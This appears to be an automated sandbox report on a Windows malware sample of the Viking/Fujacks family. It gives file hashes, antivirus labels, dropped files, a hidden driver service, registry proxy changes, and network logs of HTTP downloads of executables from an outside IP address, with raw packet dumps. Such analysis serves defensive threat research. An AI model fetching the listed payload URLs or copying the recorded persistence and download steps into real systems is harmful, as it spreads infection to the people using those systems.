Analysis Date2015-09-10 11:55:02
MD54ab1c713f27db35178f68250d1abf31e
SHA1625cf201acae3afe408b3730e29c3e680d9c7e10

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1ff1b905e2aea726ee5a8c9fdb83f5d3 sha1: 94cdaa2d1e1276f18e17238caa308c5d510d8f63 size: 409600
Section.rdata md5: ab3848b889fe7fc6a8cf0ea7bf5517a4 sha1: 42d0eb187d304bd4d5770d6fac067135e84c263f size: 65536
Section.data md5: 078d419052c239198da6f32282f2ca24 sha1: eb266d859f5db3b4f7bb450cab90736dc9fa88af size: 61440
Section.rsrc md5: fa23fdcc3c62134e1fbcc20e9f76db9d sha1: 128ff782dd03dfc82831d216d532dc30eeb032e5 size: 24576
Section.tcP] md5: 3456b76187759e6938f1a39420da28f3 sha1: 181a1792ea5c00bf38906ff88e5beb815761bf19 size: 28672
Timestamp2014-08-22 02:49:01
VersionLegalCopyright: 131-页游专用
FileVersion: 1.0.0.0
CompanyName: 131-1006
Comments: 131-页游专用
ProductName: 131-页游专用
ProductVersion: 1.0.0.0
FileDescription: 131-页游专用
PEhash093b60cf41ad3bf6ac2f11dbac9436df90469c7e
IMPhashec6c284cc44f331d3218f38083f18d64
AVRisingWin32.Agent.hn
AVMcafeeW32/Fujacks.ay
AVAvira (antivir)W32/Fujacks.DR
AVTwisterSuspicious.000000#0C8B/1.mg
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Viking-CF:Win32:Viking-CF
AVEset (nod32)Win32/Agent.DP virus
AVGrisoft (avg)Win32/Fujacks.S
AVSymantecW32.Loorp.A!inf
AVFortinetW32/Fujacks.BF!tr
AVBitDefenderWin32.Viking.AR
AVK7Virus ( 00108a531 )
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVMalwareBytesno_virus
AVAuthentiumW32/Agent.EW.gen!Eldorado
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVIkarusTrojan-Downloader.Win32.Jadtre
AVEmsisoftWin32.Viking.AR
AVZillya!Virus.Agent.Win32.34
AVKasperskyVirus.Win32.Agent.dp
AVTrend MicroPE_JEEFO.D
AVCAT (quickheal)W32.Agent.DP
AVVirusBlokAda (vba32)Virus.Win32.Koklek
AVPadvishError Scanning File
AVBullGuardWin32.Viking.AR
AVArcabit (arcavir)Win32.Viking.AR
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVF-SecureWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Settings ➝
NULL
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\NetworkService\Favorites\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Favorites\Desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates MutexShell.CMruPidlList
Winsock DNSnbtj.114anhui.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ST2ZW9EF\desktop.ini
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\1C2JVJXS\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\8XMZ0JQ3\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\V92Y02PX\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS141.8.226.14
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com
Winsock URLhttp://141.8.226.14/ko/03.exe
Winsock URLhttp://141.8.226.14/ko/02.exe

Process
↳ Pid 1112

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1852

Process
↳ Pid 1144

Network Details:

DNSnbtj.114anhui.com
Type: A
193.166.255.171
DNSwww.a.shifen.com
Type: A
103.235.46.39
DNSpc1.114central.com
Type: A
141.8.226.14
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://141.8.226.14/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://nbtj.114anhui.com/msn/163.htm?2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://141.8.226.14/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://141.8.226.14/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 141.8.226.14:80
Flows TCP192.168.1.1:1034 ➝ 193.166.255.171:80
Flows TCP192.168.1.1:1035 ➝ 141.8.226.14:80
Flows TCP192.168.1.1:1036 ➝ 141.8.226.14:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6d736e 2f313633 2e68746d   GET /msn/163.htm
0x00000010 (00016)   3f322048 5454502f 312e300d 0a416363   ?2 HTTP/1.0..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000050 (00080)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000060 (00096)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000070 (00112)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000080 (00128)   290d0a48 6f73743a 206e6274 6a2e3131   )..Host: nbtj.11
0x00000090 (00144)   34616e68 75692e63 6f6d0d0a 436f6e6e   4anhui.com..Conn
0x000000a0 (00160)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....


Strings